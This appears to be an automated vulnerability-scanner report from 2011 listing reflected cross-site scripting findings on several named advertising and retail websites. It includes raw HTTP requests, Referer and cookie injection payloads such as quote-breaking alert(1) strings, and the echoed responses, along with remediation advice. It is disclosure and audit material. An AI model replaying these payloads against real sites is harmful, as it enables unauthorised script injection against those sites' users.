Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ee0e0"-alert(1)-"af928c507e5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4DC99CCBFDEA5ECA450887DEC1D88A4C; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:32 GMT
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 841d1"-alert(1)-"c8a6010a068 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374&campId=168344 HTTP/1.1
Host: pixel.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=841d1"-alert(1)-"c8a6010a068
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BE8D7611C536C5E16DE3C5D64FE397BB; Path=/
Content-Type: text/javascript
Date: Tue, 27 Sep 2011 22:13:22 GMT
Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9beb5><a>78f40869281 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /applications/SearchTools/search.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9beb5><a>78f40869281
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6e3c5><a>0d3fc7a661c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6e3c5><a>0d3fc7a661c
The value of the Referer HTTP header is copied into an HTML comment. The payload 93492--><script>alert(1)</script>78dc5ad6ccd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79968'%3balert(1)//1e149ae6a1 was submitted in the cli cookie. This input was echoed as 79968';alert(1)//1e149ae6a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:45 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7671
var cid='12244bc34a8b1dc79968';alert(1)//1e149ae6a1';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f126'%3balert(1)//a85117f8d1c was submitted in the cli cookie. This input was echoed as 5f126';alert(1)//a85117f8d1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:41 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Content-Length: 7740
var cid='1214cf76b201e605f126';alert(1)//a85117f8d1c';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this ...[SNIP]...
Report generated by XSS.CX at Wed Oct 05 10:34:16 CDT 2011.